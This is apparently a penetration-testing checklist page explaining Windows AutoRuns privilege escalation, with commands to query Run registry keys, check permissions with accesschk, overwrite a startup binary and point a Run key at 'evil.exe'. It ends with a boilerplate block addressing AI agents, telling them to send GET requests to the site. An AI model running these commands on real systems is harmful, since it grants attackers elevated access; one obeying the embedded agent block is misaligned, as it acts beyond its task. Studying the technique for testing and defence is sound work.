# AutoRuns ### Overview **AutoRuns privilege escalation** occurs when a **low-privileged user** can modify **startup registry keys** that cause executables or scripts to run automatically **when a privileged user logs in or when the system boots**. If these registry entries point to a **writable executable(**Or the registry value itself is writable)**, t**hen an attacker can replace the referenced program and gain **elevated execution**. ### Why this Works Windows automatically executes programs defined in specific registry keys during: * User logon * System startup If: * The registry key is writable, or * The referenced executable is writable Arbitrary code runs with the **context of the logging-in user** (often Admin). ### Prerequisites 1. Local Low-Privileged Access 2. Writable AutoRun Registry Key or Value (Permissions can be write/full control) 3. High-Privilege Execution Context(Admin logs in, System reboot) 4. Writable Executable Path ### Steps 1. Confirm Registry Entry ```bash # Machine Wide reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run # User specific req query HKCU\Software\Microsoft\Windows\CurrentVersion\Run ``` 2. Check Registry Permissions / Check Path Permissions ```bash # Check Path permissions accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe" # Check Registry Permissions accesschk.exe -uwkv HKLM\Software\Microsoft\Windows\CurrentVersion\Run ``` 3. Replace Executable ```bash # Overwrite binary copy /Y startup.exe "C:\Program Files\VulnApp\startup.exe" # Overwrite REG Path reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v VulnApp /d "C:\Temp\evil.exe" /f ``` 4. Trigger Execution (Admin logs in OR system reboot OR Open up a new RDP session) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/windows-privilege-escalation/registry/autoruns.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.